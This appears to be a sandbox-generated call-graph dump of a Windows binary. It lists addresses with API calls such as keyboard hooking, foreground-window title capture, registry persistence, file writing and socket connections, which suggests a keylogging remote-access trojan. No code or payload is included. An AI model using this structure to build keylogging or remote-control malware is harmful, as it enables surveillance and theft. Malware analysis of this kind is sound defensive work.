46328->46054 46333 44cd48 46329->46333 46332 436cfa 8 API calls 3 library calls 46332->46059 46336 44cd65 46333->46336 46337 44cd61 46333->46337 46335 432372 46335->46057 46335->46332 46336->46337 46339 4475a6 46336->46339 46351 432d4b 5 API calls ___raise_securityfailure 46337->46351 46340 4475b2 ___scrt_is_nonwritable_in_current_image 46339->46340 46352 442d9a EnterCriticalSection 46340->46352 46342 4475b9 46353 44d363 46342->46353 46344 4475c8 46350 4475d7 46344->46350 46364 44743a 23 API calls 46344->46364 46347 4475d2 46365 4474f0 GetStdHandle GetFileType 46347->46365 46348 4475e8 ___scrt_is_nonwritable_in_current_image 46348->46336 46366 4475f3 LeaveCriticalSection std::_Lockit::~_Lockit 46350->46366 46351->46335 46352->46342 46354 44d36f ___scrt_is_nonwritable_in_current_image 46353->46354 46355 44d393 46354->46355 46356 44d37c 46354->46356 46367 442d9a EnterCriticalSection 46355->46367 46375 43ad91 20 API calls _free 46356->46375 46359 44d3cb 46376 44d3f2 LeaveCriticalSection std::_Lockit::~_Lockit 46359->46376 46360 44d381 pre_c_initialization ___scrt_is_nonwritable_in_current_image 46360->46344 46361 44d39f 46361->46359 46368 44d2b4 46361->46368 46364->46347 46365->46350 46366->46348 46367->46361 46377 443005 46368->46377 46370 44d2d3 46385 443c92 20 API calls _free 46370->46385 46371 44d2c6 46371->46370 46384 445fb3 11 API calls 2 library calls 46371->46384 46374 44d325 46374->46361 46375->46360 46376->46360 46382 443012 ___crtLCMapStringA 46377->46382 46378 443052 46387 43ad91 20 API calls _free 46378->46387 46379 44303d RtlAllocateHeap 46380 443050 46379->46380 46379->46382 46380->46371 46382->46378 46382->46379 46386 440480 7 API calls 2 library calls 46382->46386 46384->46371 46385->46374 46386->46382 46387->46380 46389 4328dc GetStartupInfoW 46388->46389 46389->46063 46391 44c24b 46390->46391 46392 44c242 46390->46392 46391->46067 46395 44c138 48 API calls 4 library calls 46392->46395 46394->46067 46395->46391 46397 41a919 LoadLibraryA GetProcAddress 46396->46397 46398 41a909 GetModuleHandleA GetProcAddress 46396->46398 46399 41a947 GetModuleHandleA GetProcAddress 46397->46399 46400 41a937 GetModuleHandleA GetProcAddress 46397->46400 46398->46397 46401 41a973 24 API calls 46399->46401 46402 41a95f GetModuleHandleA GetProcAddress 46399->46402 46400->46399 46401->46071 46402->46401 46789 419493 FindResourceA 46403->46789 46406 439adb _Yarn 21 API calls 46407 40ddad _Yarn 46406->46407 46792 402097 46407->46792 46410 401fc2 28 API calls 46411 40ddd3 46410->46411 46412 401fb8 11 API calls 46411->46412 46413 40dddc 46412->46413 46414 439adb _Yarn 21 API calls 46413->46414 46415 40dded _Yarn 46414->46415 46798 4062ee 46415->46798 46417 40de20 46417->46073 46419 4020ec 46418->46419 46420 4023ae 11 API calls 46419->46420 46421 402106 46420->46421 46422 402549 28 API calls 46421->46422 46423 402114 46422->46423 46423->46076 46850 4020bf 46424->46850 46426 419e0a 46427 401fb8 11 API calls 46426->46427 46428 419e3c 46427->46428 46429 401fb8 11 API calls 46428->46429 46431 419e44 46429->46431 46430 419e0c 46856 404182 28 API calls 46430->46856 46434 401fb8 11 API calls 46431->46434 46436 40d43c 46434->46436 46435 419e18 46437 401fc2 28 API calls 46435->46437 46446 40e563 46436->46446 46439 419e21 46437->46439 46438 401fc2 28 API calls 46445 419d9a 46438->46445 46441 401fb8 11 API calls 46439->46441 46440 401fb8 11 API calls 46440->46445 46442 419e29 46441->46442 46857 41ab9a 28 API calls 46442->46857 46445->46426 46445->46430 46445->46438 46445->46440 46854 404182 28 API calls 46445->46854 46855 41ab9a 28 API calls 46445->46855 46447 40e56f 46446->46447 46449 40e576 46446->46449 46858 402143 11 API calls 46447->46858 46449->46081 46451 402143 46450->46451 46452 40217f 46451->46452 46859 402710 11 API calls 46451->46859 46452->46083 46454 402164 46860 4026f2 11 API calls std::_Deallocate 46454->46860 46457 401e4d 46456->46457 46458 401e55 46457->46458 46861 402138 22 API calls 46457->46861 46458->46088 46462 4020bf 11 API calls 46461->46462 46463 40530a 46462->46463 46862 403280 46463->46862 46465 405326 46465->46096 46866 4051cf 46466->46866 46468 408217 46870 402035 46468->46870 46471 401fc2 46472 401fd1 46471->46472 46473 402019 46471->46473 46474 4023ae 11 API calls 46472->46474 46480 401fb8 46473->46480 46475 401fda 46474->46475 46476 40201c 46475->46476 46478 401ff5 46475->46478 46477 40265a 11 API calls 46476->46477 46477->46473 46902 403078 28 API calls 46478->46902 46481 4023ae 11 API calls 46480->46481 46482 401fc1 46481->46482 46482->46110 46484 401fb2 46483->46484 46485 401fa9 46483->46485 46484->46115 46903 4025c0 28 API calls 46485->46903 46488 4020bf 11 API calls 46487->46488 46489 408236 46488->46489 46490 403280 28 API calls 46489->46490 46491 408253 46490->46491 46491->46123 46493 40d5c5 46492->46493 46494 411f5e RegQueryValueExA RegCloseKey 46492->46494 46493->46120 46493->46144 46494->46493 46904 419f23 46495->46904 46500 401fc2 28 API calls 46501 4192ea 46500->46501 46502 401fb8 11 API calls 46501->46502 46503 4192f2 46502->46503 46504 411f91 31 API calls 46503->46504 46506 419348 46503->46506 46505 41931b 46504->46505 46507 419326 StrToIntA 46505->46507 46506->46143 46508 41933d 46507->46508 46509 419334 46507->46509 46511 401fb8 11 API calls 46508->46511 46912 41accf 22 API calls 46509->46912 46511->46506 46513 412356 46512->46513 46514 4062ee 28 API calls 46513->46514 46515 41236b 46514->46515 46516 4020d6 28 API calls 46515->46516 46517 41237b 46516->46517 46518 41215f 14 API calls 46517->46518 46519 412385 46518->46519 46520 401fb8 11 API calls 46519->46520 46521 412392 46520->46521 46521->46245 46523 40207b 46522->46523 46524 4023ae 11 API calls 46523->46524 46525 402086 46524->46525 46913 4024cd 46525->46913 46529 4121af 46528->46529 46531 412178 46528->46531 46530 401fb8 11 API calls 46529->46530 46532 40da38 46530->46532 46533 41218a RegSetValueExA RegCloseKey 46531->46533 46532->46195 46533->46529 46535 439880 _strftime 46534->46535 46917 438bbe 46535->46917 46537 40da51 46537->46202 46537->46205 46539 4194f0 GetLocalTime 46538->46539 46540 41958b 46538->46540 46541 4052fe 28 API calls 46539->46541 46542 401fb8 11 API calls 46540->46542 46543 419532 46541->46543 46544 419593 46542->46544 46545 408209 28 API calls 46543->46545 46546 401fb8 11 API calls 46544->46546 46547 41953e 46545->46547 46548 40daa1 46546->46548 46945 402ef0 46547->46945 46548->46220 46551 408209 28 API calls 46552 419556 46551->46552 46950 41928b 76 API calls 46552->46950 46554 419564 46555 401fb8 11 API calls 46554->46555 46556 419570 46555->46556 46557 401fb8 11 API calls 46556->46557 46558 419579 46557->46558 46559 401fb8 11 API calls 46558->46559 46560 419582 46559->46560 46561 401fb8 11 API calls 46560->46561 46561->46540 46954 401f66 46562->46954 46564 408f36 _wcslen 46565 408f60 46564->46565 46566 408f49 46564->46566 46567 40c5ed 31 API calls 46565->46567 46568 40c5ed 31 API calls 46566->46568 46570 408f68 46567->46570 46569 408f51 46568->46569 46571 401ef3 28 API calls 46569->46571 46572 401ef3 28 API calls 46570->46572 46598 408f5b 46571->46598 46573 408f76 46572->46573 46574 401ee9 11 API calls 46573->46574 46576 408f7e 46574->46576 46575 401ee9 11 API calls 46577 408fb5 46575->46577 46986 4081c7 28 API calls 46576->46986 46579 408ffb 46577->46579 46580 408fdc 46577->46580 46958 408098 46579->46958 46582 408fe1 46580->46582 46583 409013 46580->46583 46581 408f90 46987 402ff4 46581->46987 46587 408098 28 API calls 46582->46587 46586 401ee9 11 API calls 46583->46586 46590 40901b 46586->46590 46591 408fef 46587->46591 46590->46263 46992 4092ba 29 API calls 46591->46992 46593 401ef3 28 API calls 46595 408fa5 46593->46595 46596 401ee9 11 API calls 46595->46596 46596->46598 46597 408ff9 46597->46583 46598->46575 47177 40415e 46599->47177 46604 402ff4 28 API calls 46605 41965d 46604->46605 46606 401ee9 11 API calls 46605->46606 46607 419666 46606->46607 46608 401ee9 11 API calls 46607->46608 46609 40dca2 46608->46609 46610 401ef3 46609->46610 46611 401f02 46610->46611 46612 401f4a 46610->46612 46613 402232 11 API calls 46611->46613 46619 401ee9 46612->46619 46614 401f0b 46613->46614 46615 401f4d 46614->46615 46616 401f26 46614->46616 46617 402316 11 API calls 46615->46617 47273 40303c 28 API calls 46616->47273 46617->46612 46620 402232 11 API calls 46619->46620 46621 401ef2 46620->46621 46621->46308 46621->46309 47274 40533f 28 API calls 46622->47274 46625 4020bf 11 API calls 46624->46625 46626 413994 46625->46626 47275 419894 46626->47275 46629 4020bf 11 API calls 46630 4139aa 46629->46630 46631 401e45 22 API calls 46630->46631 46632 4139b8 46631->46632 46633 439867 _strftime 39 API calls 46632->46633 46634 4139c5 46633->46634 46635 4139d7 46634->46635 46636 4139ca Sleep 46634->46636 46637 402073 28 API calls 46635->46637 46636->46635 46638 4139e6 46637->46638 46639 401e45 22 API calls 46638->46639 46640 4139ef 46639->46640 46641 4020d6 28 API calls 46640->46641 46642 4139fa 46641->46642 46643 419d87 28 API calls 46642->46643 46644 413a02 46643->46644 47279 40487e WSAStartup 46644->47279 46646 413a0c 46647 401e45 22 API calls 46646->46647 46648 413a15 46647->46648 46649 401e45 22 API calls 46648->46649 46654 413a94 46648->46654 46650 413a2e 46649->46650 46651 401e45 22 API calls 46650->46651 46653 413a3f 46651->46653 46652 4020d6 28 API calls 46652->46654 46656 401e45 22 API calls 46653->46656 46654->46652 46655 419d87 28 API calls 46654->46655 46657 401e45 22 API calls 46654->46657 46659 40822a 28 API calls 46654->46659 46662 401fc2 28 API calls 46654->46662 46665 401fb8 11 API calls 46654->46665 46670 413be2 WSAGetLastError 46654->46670 46673 4052dd 28 API calls 46654->46673 46676 4194da 79 API calls 46654->46676 46678 4052fe 28 API calls 46654->46678 46679 401e6d 11 API calls 46654->46679 46680 439867 _strftime 39 API calls 46654->46680 46681 408209 28 API calls 46654->46681 46683 402ef0 28 API calls 46654->46683 46684 402073 28 API calls 46654->46684 46686 408098 28 API calls 46654->46686 46689 411f91 31 API calls 46654->46689 46712 413e11 46654->46712 47280 41393f 46654->47280 47285 40480d 46654->47285 47292 404f31 46654->47292 47307 4048a8 connect 46654->47307 47367 404e06 WaitForSingleObject 46654->47367 47383 413013 50 API calls 46654->47383 47384 43f34f 20 API calls 46654->47384 47385 4120e8 RegOpenKeyExA RegQueryValueExA RegCloseKey 46654->47385 46655->46654 46658 413a50 46656->46658 46657->46654 46660 401e45 22 API calls 46658->46660 46659->46654 46661 413a61 46660->46661 46663 401e45 22 API calls 46661->46663 46662->46654 46664 413a72 46663->46664 46666 401e45 22 API calls 46664->46666 46665->46654 46667 413a84 46666->46667 47381 40471d 88 API calls 46667->47381 47382 41a86b 30 API calls 46670->47382 46673->46654 46676->46654 46678->46654 46679->46654 46682 4144bf Sleep 46680->46682 46681->46654 46682->46654 46683->46654 46684->46654 46686->46654 46689->46654 46690 40415e 28 API calls 46690->46712 46691 419c8a 28 API calls 46691->46712 46692 419b16 28 API calls 46692->46712 46693 401e45 22 API calls 46694 413e7b GetTickCount 46693->46694 47386 419b16 28 API calls 46694->47386 46700 408209 28 API calls 46700->46712 46702 402ef0 28 API calls 46702->46712 46703 402e81 28 API calls 46703->46712 46705 401ee9 11 API calls 46705->46712 46708 402073 28 API calls 46708->46712 46709 4194da 79 API calls 46709->46712 46710 414461 CreateThread 46710->46712 47417 418ccd 104 API calls 46710->47417 46711 401fb8 11 API calls 46711->46712 46712->46654 46712->46690 46712->46691 46712->46692 46712->46693 46712->46700 46712->46702 46712->46703 46712->46705 46712->46708 46712->46709 46712->46710 46712->46711 47387 419ac6 GetTickCount 46712->47387 47388 419a77 30 API calls ___scrt_fastfail 46712->47388 47389 40e2bb 29 API calls 46712->47389 47390 402f11 28 API calls 46712->47390 47391 40826c 28 API calls 46712->47391 47392 404a81 60 API calls _Yarn 46712->47392 47393 404bf0 112 API calls _Yarn 46712->47393 47394 409f9a 84 API calls 46712->47394 46713->46089 46714->46097 46715->46101 46717->46126 46718->46146 46719->46173 46720->46146 46721->46154 46723 401f66 11 API calls 46722->46723 46724 40c609 46723->46724 46725 40c629 46724->46725 46726 40c65e 46724->46726 46728 40c61f 46724->46728 47418 41959f 29 API calls 46725->47418 46729 419f23 GetCurrentProcess 46726->46729 46727 40c752 GetLongPathNameW 46731 40415e 28 API calls 46727->46731 46728->46727 46732 40c663 46729->46732 46734 40c767 46731->46734 46735 40c667 46732->46735 46736 40c6b9 46732->46736 46733 40c632 46737 401ef3 28 API calls 46733->46737 46738 40415e 28 API calls 46734->46738 46740 40415e 28 API calls 46735->46740 46739 40415e 28 API calls 46736->46739 46741 40c63c 46737->46741 46742 40c776 46738->46742 46743 40c6c7 46739->46743 46744 40c675 46740->46744 46746 401ee9 11 API calls 46741->46746 47421 40c7f9 28 API calls 46742->47421 46749 40415e 28 API calls 46743->46749 46750 40415e 28 API calls 46744->46750 46746->46728 46747 40c789 47422 402f85 28 API calls 46747->47422 46752 40c6dd 46749->46752 46753 40c68b 46750->46753 46751 40c794 47423 402f85 28 API calls 46751->47423 47420 402f85 28 API calls 46752->47420 47419 402f85 28 API calls 46753->47419 46757 40c79e 46760 401ee9 11 API calls 46757->46760 46758 40c6e8 46761 401ef3 28 API calls 46758->46761 46759 40c696 46762 401ef3 28 API calls 46759->46762 46763 40c7a8 46760->46763 46764 40c6f3 46761->46764 46765 40c6a1 46762->46765 46767 401ee9 11 API calls 46763->46767 46768 401ee9 11 API calls 46764->46768 46766 401ee9 11 API calls 46765->46766 46770 40c6aa 46766->46770 46771 40c7b1 46767->46771 46769 40c6fc 46768->46769 46772 401ee9 11 API calls 46769->46772 46773 401ee9 11 API calls 46770->46773 46774 401ee9 11 API calls 46771->46774 46772->46741 46773->46741 46775 40c7ba 46774->46775 46776 401ee9 11 API calls 46775->46776 46777 40c7c3 46776->46777 46778 401ee9 11 API calls 46777->46778 46779 40c7cc 46778->46779 46779->46235 46780->46246 46781->46260 46782->46264 46783->46174 46784->46210 46785->46302 46786->46291 46787->46150 46790 4194b0 LoadResource LockResource SizeofResource 46789->46790 46791 40dd9e 46789->46791 46790->46791 46791->46406 46793 40209f 46792->46793 46801 4023ae 46793->46801 46795 4020aa 46805 4024ea 46795->46805 46797 4020b9 46797->46410 46799 402097 28 API calls 46798->46799 46800 406302 46799->46800 46800->46417 46802 402408 46801->46802 46803 4023b8 46801->46803 46802->46795 46803->46802 46812 402787 11 API calls std::_Deallocate 46803->46812 46806 4024fa 46805->46806 46807 402500 46806->46807 46808 402515 46806->46808 46813 402549 46807->46813 46823 4028c8 46808->46823 46811 402513 46811->46797 46812->46802 46834 402868 46813->46834 46815 40255d 46816 402572 46815->46816 46817 402587 46815->46817 46839 402a14 22 API calls 46816->46839 46818 4028c8 28 API calls 46817->46818 46822 402585 46818->46822 46820 40257b 46840 4029ba 22 API calls 46820->46840 46822->46811 46824 4028d1 46823->46824 46825 402933 46824->46825 46826 4028db 46824->46826 46848 402884 22 API calls 46825->46848 46829 4028e4 46826->46829 46831 4028f7 46826->46831 46842 402c8e 46829->46842 46832 4028f5 46831->46832 46833 4023ae 11 API calls 46831->46833 46832->46811 46833->46832 46835 402870 46834->46835 46836 402878 46835->46836 46841 402c83 22 API calls 46835->46841 46836->46815 46839->46820 46840->46822 46843 402c98 __EH_prolog 46842->46843 46849 402e34 22 API calls 46843->46849 46845 4023ae 11 API calls 46847 402d72 46845->46847 46846 402d04 46846->46845 46847->46832 46849->46846 46851 4020c7 46850->46851 46852 4023ae 11 API calls 46851->46852 46853 4020d2 46852->46853 46853->46445 46854->46445 46855->46445 46856->46435 46857->46426 46858->46449 46859->46454 46860->46452 46864 40328a 46862->46864 46863 4032a9 46863->46465 46864->46863 46865 4028c8 28 API calls 46864->46865 46865->46863 46867 4051db 46866->46867 46876 405254 46867->46876 46869 4051e8 46869->46468 46871 402041 46870->46871 46872 4023ae 11 API calls 46871->46872 46873 40205b 46872->46873 46898 40265a 46873->46898 46877 405262 46876->46877 46878 405268 46877->46878 46879 40527e 46877->46879 46887 4025d0 46878->46887 46881 4052d5 46879->46881 46882 405296 46879->46882 46896 402884 22 API calls 46881->46896 46885 4028c8 28 API calls 46882->46885 46886 40527c 46882->46886 46885->46886 46886->46869 46888 402868 22 API calls 46887->46888 46889 4025e2 46888->46889 46890 402652 46889->46890 46891 402609 46889->46891 46897 402884 22 API calls 46890->46897 46893 4028c8 28 API calls 46891->46893 46895 40261b 46891->46895 46893->46895 46895->46886 46899 40266b 46898->46899 46900 4023ae 11 API calls 46899->46900 46901 40206d 46900->46901 46901->46471 46902->46473 46903->46484 46905 419f30 GetCurrentProcess 46904->46905 46906 4192bc 46904->46906 46905->46906 46907 411f91 RegOpenKeyExA 46906->46907 46908 411fbf RegQueryValueExA RegCloseKey 46907->46908 46909 411fe9 46907->46909 46908->46909 46910 402073 28 API calls 46909->46910 46911 411ffe 46910->46911 46911->46500 46912->46508 46914 4024d9 46913->46914 46915 4024ea 28 API calls 46914->46915 46916 402091 46915->46916 46916->46190 46933 4397c5 46917->46933 46919 438c0b 46939 438557 35 API calls 3 library calls 46919->46939 46920 438bd0 46920->46919 46921 438be5 46920->46921 46932 438bea pre_c_initialization 46920->46932 46938 43ad91 20 API calls _free 46921->46938 46925 438c17 46926 438c46 46925->46926 46940 43980a 39 API calls __Toupper 46925->46940 46929 438cb2 46926->46929 46941 439771 20 API calls 2 library calls 46926->46941 46942 439771 20 API calls 2 library calls 46929->46942 46930 438d79 _strftime 46930->46932 46943 43ad91 20 API calls _free 46930->46943 46932->46537 46934 4397ca 46933->46934 46935 4397dd 46933->46935 46944 43ad91 20 API calls _free 46934->46944 46935->46920 46937 4397cf pre_c_initialization 46937->46920 46938->46932 46939->46925 46940->46925 46941->46929 46942->46930 46943->46932 46944->46937 46951 401f90 46945->46951 46947 402efe 46948 402035 11 API calls 46947->46948 46949 402f0d 46948->46949 46949->46551 46950->46554 46952 4025d0 28 API calls 46951->46952 46953 401f9d 46952->46953 46953->46947 46955 401f6e 46954->46955 46993 402232 46955->46993 46957 401f79 46957->46564 46959 4080ae 46958->46959 46960 402232 11 API calls 46959->46960 46961 4080c8 46960->46961 46998 404247 46961->46998 46963 4080d6 46964 409203 46963->46964 47011 40a83c 46964->47011 46967 409257 46970 402073 28 API calls 46967->46970 46968 40922f 46969 402073 28 API calls 46968->46969 46971 409239 46969->46971 46972 409262 46970->46972 47015 419bca 28 API calls 46971->47015 46974 402073 28 API calls 46972->46974 46976 409271 46974->46976 46975 409247 47016 40a0b0 31 API calls _Yarn 46975->47016 46978 4194da 79 API calls 46976->46978 46979 409276 CreateThread 46978->46979 46981 409291 CreateThread 46979->46981 46982 40929d CreateThread 46979->46982 47024 409305 46979->47024 46980 40924e 46983 401fb8 11 API calls 46980->46983 46981->46982 47021 4092ef 46981->47021 46984 401ee9 11 API calls 46982->46984 47018 409311 46982->47018 46983->46967 46985 4092b1 46984->46985 46985->46583 46986->46581 47148 403202 46987->47148 46989 403002 47152 403242 46989->47152 46992->46597 47176 4092fb 162 API calls 46992->47176 46994 40228c 46993->46994 46995 40223c 46993->46995 46994->46957 46995->46994 46997 402759 11 API calls std::_Deallocate 46995->46997 46997->46994 46999 402868 22 API calls 46998->46999 47000 40425b 46999->47000 47001 404270 47000->47001 47002 404285 47000->47002 47008 4042bf 22 API calls 47001->47008 47010 4027c6 28 API calls 47002->47010 47005 404279 47009 402c28 22 API calls 47005->47009 47007 404283 47007->46963 47008->47005 47009->47007 47010->47007 47012 40a845 47011->47012 47013 409221 47011->47013 47017 40a8bc 28 API calls 47012->47017 47013->46967 47013->46968 47015->46975 47016->46980 47017->47013 47027 409c1f 47018->47027 47073 409340 47021->47073 47089 40971e 47024->47089 47034 409c2d 47027->47034 47028 40931a 47029 409c87 Sleep GetForegroundWindow GetWindowTextLengthW 47057 40a854 47029->47057 47033 401f66 11 API calls 47033->47034 47034->47028 47034->47029 47034->47033 47037 409ccd GetWindowTextW 47034->47037 47056 409ce7 47034->47056 47063 43219b EnterCriticalSection LeaveCriticalSection WaitForSingleObjectEx __Init_thread_wait __Init_thread_footer 47034->47063 47064 432525 23 API calls __onexit 47034->47064 47065 43215c SetEvent ResetEvent EnterCriticalSection LeaveCriticalSection __Init_thread_footer 47034->47065 47036 419ac6 GetTickCount 47036->47056 47037->47034 47039 40a83c 28 API calls 47039->47056 47040 409e25 47041 401ee9 11 API calls 47040->47041 47041->47028 47042 409d92 Sleep 47042->47056 47045 402073 28 API calls 47045->47056 47046 4052dd 28 API calls 47046->47056 47047 408098 28 API calls 47047->47056 47049 408209 28 API calls 47049->47056 47051 402ff4 28 API calls 47051->47056 47053 401ee9 11 API calls 47053->47056 47054 40962e 12 API calls 47054->47056 47055 401fb8 11 API calls 47055->47056 47056->47034 47056->47036 47056->47039 47056->47040 47056->47042 47056->47045 47056->47046 47056->47047 47056->47049 47056->47051 47056->47053 47056->47054 47056->47055 47066 408080 28 API calls 47056->47066 47067 40a0b0 31 API calls _Yarn 47056->47067 47068 40a8cc 28 API calls 47056->47068 47069 40a694 40 API calls 2 library calls 47056->47069 47070 43f34f 20 API calls 47056->47070 47071 419bca 28 API calls 47056->47071 47058 40a85c 47057->47058 47059 402232 11 API calls 47058->47059 47060 40a867 47059->47060 47072 40a87c 28 API calls 47060->47072 47062 40a876 47062->47034 47064->47034 47065->47034 47066->47056 47067->47056 47068->47056 47069->47056 47070->47056 47071->47056 47072->47062 47074 409359 GetModuleHandleA SetWindowsHookExA 47073->47074 47075 4093bb GetMessageA 47073->47075 47074->47075 47077 409375 GetLastError 47074->47077 47076 4093cd TranslateMessage DispatchMessageA 47075->47076 47087 4092f8 47075->47087 47076->47075 47076->47087 47088 419b16 28 API calls 47077->47088 47079 409386 47080 4052dd 28 API calls 47079->47080 47081 409396 47080->47081 47082 402073 28 API calls 47081->47082 47083 4093a5 47082->47083 47084 4194da 79 API calls 47083->47084 47085 4093aa 47084->47085 47086 401fb8 11 API calls 47085->47086 47086->47087 47088->47079 47090 409733 Sleep 47089->47090 47110 40966d 47090->47110 47092 40930e 47093 409773 CreateDirectoryW 47099 409745 47093->47099 47094 409784 GetFileAttributesW 47094->47099 47095 40979b SetFileAttributesW 47095->47099 47096 4020bf 11 API calls 47108 4097e6 47096->47108 47098 409815 PathFileExistsW 47098->47108 47099->47090 47099->47092 47099->47093 47099->47094 47099->47095 47100 401e45 22 API calls 47099->47100 47099->47108 47123 41a17b 47099->47123 47100->47099 47102 402097 28 API calls 47102->47108 47103 40991e SetFileAttributesW 47103->47099 47104 401fb8 11 API calls 47104->47108 47105 4062ee 28 API calls 47105->47108 47106 401fc2 28 API calls 47106->47108 47108->47096 47108->47098 47108->47102 47108->47103 47108->47104 47108->47105 47108->47106 47109 401fb8 11 API calls 47108->47109 47133 41a20f CreateFileW 47108->47133 47141 41a27c CreateFileW SetFilePointer CloseHandle WriteFile CloseHandle 47108->47141 47109->47099 47111 40971a 47110->47111 47114 409683 47110->47114 47111->47099 47112 4096a2 CreateFileW 47113 4096b0 GetFileSize 47112->47113 47112->47114 47113->47114 47115 4096e5 CloseHandle 47113->47115 47114->47112 47114->47115 47116 4096f7 47114->47116 47117 4096d3 47114->47117 47118 4096da Sleep 47114->47118 47115->47114 47116->47111 47120 408098 28 API calls 47116->47120 47142 40a025 83 API calls 47117->47142 47118->47115 47121 409713 47120->47121 47122 409203 123 API calls 47121->47122 47122->47111 47124 41a18e CreateFileW 47123->47124 47126 41a1c7 47124->47126 47127 41a1cb 47124->47127 47126->47099 47128 41a1d2 SetFilePointer 47127->47128 47129 41a1eb WriteFile 47127->47129 47128->47129 47130 41a1e2 CloseHandle 47128->47130 47131 41a200 CloseHandle 47129->47131 47132 41a1fe 47129->47132 47130->47126 47131->47126 47132->47131 47134 41a239 GetFileSize 47133->47134 47135 41a235 47133->47135 47143 40242e 47134->47143 47135->47108 47137 41a24d 47138 41a25f ReadFile 47137->47138 47139 41a26c 47138->47139 47140 41a26e CloseHandle 47138->47140 47139->47140 47140->47135 47141->47108 47142->47118 47144 402436 47143->47144 47146 402440 47144->47146 47147 402a31 28 API calls 47144->47147 47146->47137 47147->47146 47149 40320e 47148->47149 47158 4035f8 47149->47158 47151 40321b 47151->46989 47153 40324e 47152->47153 47154 402232 11 API calls 47153->47154 47155 403268 47154->47155 47172 402316 47155->47172 47159 403606 47158->47159 47160 403624 47159->47160 47161 40360c 47159->47161 47163 40363c 47160->47163 47164 40367e 47160->47164 47169 403686 28 API calls 47161->47169 47168 403622 47163->47168 47170 4027c6 28 API calls 47163->47170 47171 402884 22 API calls 47164->47171 47168->47151 47169->47168 47170->47168 47173 402327 47172->47173 47174 402232 11 API calls 47173->47174 47175 4023a7 47174->47175 47175->46593 47178 404166 47177->47178 47179 402232 11 API calls 47178->47179 47180 404171 47179->47180 47188 40419c 47180->47188 47183 4042dc 47200 404333 47183->47200 47185 4042ea 47186 403242 11 API calls 47185->47186 47187 4042f9 47186->47187 47187->46604 47189 4041a8 47188->47189 47192 4041b9 47189->47192 47191 40417c 47191->47183 47193 4041c9 47192->47193 47194 4041e6 47193->47194 47195 4041cf 47193->47195 47199 4027c6 28 API calls 47194->47199 47197 404247 28 API calls 47195->47197 47198 4041e4 47197->47198 47198->47191 47199->47198 47201 40433f 47200->47201 47204 404351 47201->47204 47203 40434d 47203->47185 47205 40435f 47204->47205 47206 404365 47205->47206 47207 40437e 47205->47207 47270 4034c6 28 API calls 47206->47270 47208 402868 22 API calls 47207->47208 47209 404386 47208->47209 47211 4043f9 47209->47211 47212 40439f 47209->47212 47272 402884 22 API calls 47211->47272 47223 40437c 47212->47223 47271 4027c6 28 API calls 47212->47271 47223->47203 47270->47223 47271->47223 47273->46612 47278 4198da _Yarn ___scrt_fastfail 47275->47278 47276 402073 28 API calls 47277 41399f 47276->47277 47277->46629 47278->47276 47279->46646 47281 413958 getaddrinfo WSASetLastError 47280->47281 47282 41394e 47280->47282 47281->46654 47395 4137dc 29 API calls ___std_exception_copy 47282->47395 47284 413953 47284->47281 47286 404826 socket 47285->47286 47287 404819 47285->47287 47288 404840 CreateEventW 47286->47288 47289 404822 47286->47289 47396 40487e WSAStartup 47287->47396 47288->46654 47289->46654 47291 40481e 47291->47286 47291->47289 47293 404f45 47292->47293 47295 404fca 47292->47295 47294 404f4e 47293->47294 47296 404fa0 CreateEventA CreateThread 47293->47296 47297 404f5d GetLocalTime 47293->47297 47294->47296 47295->46654 47296->47295 47398 405130 47296->47398 47397 419b16 28 API calls 47297->47397 47299 404f71 47300 4052dd 28 API calls 47299->47300 47301 404f81 47300->47301 47302 402073 28 API calls 47301->47302 47303 404f90 47302->47303 47304 4194da 79 API calls 47303->47304 47305 404f95 47304->47305 47306 401fb8 11 API calls 47305->47306 47306->47296 47308 4049fb 47307->47308 47309 4048ce 47307->47309 47310 40495e 47308->47310 47311 404a01 WSAGetLastError 47308->47311 47309->47310 47314 4052fe 28 API calls 47309->47314 47330 404903 47309->47330 47310->46654 47311->47310 47312 404a11 47311->47312 47315 404a16 47312->47315 47317 404912 47312->47317 47318 4048ef 47314->47318 47413 41a86b 30 API calls 47315->47413 47316 40490b 47316->47317 47320 404921 47316->47320 47321 402073 28 API calls 47317->47321 47322 402073 28 API calls 47318->47322 47332 404930 47320->47332 47333 404967 47320->47333 47325 404a60 47321->47325 47326 4048fe 47322->47326 47323 404a20 47324 4052dd 28 API calls 47323->47324 47327 404a30 47324->47327 47328 402073 28 API calls 47325->47328 47329 4194da 79 API calls 47326->47329 47331 402073 28 API calls 47327->47331 47334 404a6f 47328->47334 47329->47330 47402 41ea15 27 API calls 47330->47402 47335 404a3f 47331->47335 47337 402073 28 API calls 47332->47337 47410 41f7f5 53 API calls 47333->47410 47338 4194da 79 API calls 47334->47338 47339 4194da 79 API calls 47335->47339 47341 40493f 47337->47341 47338->47310 47342 404a44 47339->47342 47340 40496f 47343 4049a4 47340->47343 47344 404974 47340->47344 47345 402073 28 API calls 47341->47345 47346 401fb8 11 API calls 47342->47346 47412 41ebbb 28 API calls 47343->47412 47347 402073 28 API calls 47344->47347 47348 40494e 47345->47348 47346->47310 47351 404983 47347->47351 47352 4194da 79 API calls 47348->47352 47350 4049ac 47353 4049d9 CreateEventW CreateEventW 47350->47353 47356 402073 28 API calls 47350->47356 47354 402073 28 API calls 47351->47354 47355 404953 47352->47355 47353->47310 47357 404992 47354->47357 47403 41ea55 47355->47403 47359 4049c2 47356->47359 47360 4194da 79 API calls 47357->47360 47361 402073 28 API calls 47359->47361 47362 404997 47360->47362 47363 4049d1 47361->47363 47411 41ee67 51 API calls 47362->47411 47365 4194da 79 API calls 47363->47365 47366 4049d6 47365->47366 47366->47353 47368 404e20 SetEvent CloseHandle 47367->47368 47369 404e37 closesocket 47367->47369 47370 404eb8 47368->47370 47371 404e44 47369->47371 47370->46654 47372 404e53 47371->47372 47373 404e5a 47371->47373 47416 4050c4 83 API calls 47372->47416 47375 404e6c WaitForSingleObject 47373->47375 47376 404eae SetEvent CloseHandle 47373->47376 47377 41ea55 3 API calls 47375->47377 47376->47370 47378 404e7b SetEvent WaitForSingleObject 47377->47378 47379 41ea55 3 API calls 47378->47379 47380 404e93 SetEvent CloseHandle CloseHandle 47379->47380 47380->47376 47381->46654 47382->46654 47383->46654 47384->46654 47385->46654 47386->46712 47387->46712 47388->46712 47389->46712 47390->46712 47391->46712 47392->46712 47393->46712 47394->46712 47395->47284 47396->47291 47397->47299 47401 40513c 101 API calls 47398->47401 47400 405139 47401->47400 47402->47316 47404 41c4c6 47403->47404 47405 41ea5d 47403->47405 47406 41c4d4 47404->47406 47414 41b610 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 47404->47414 47405->47310 47415 41c1f6 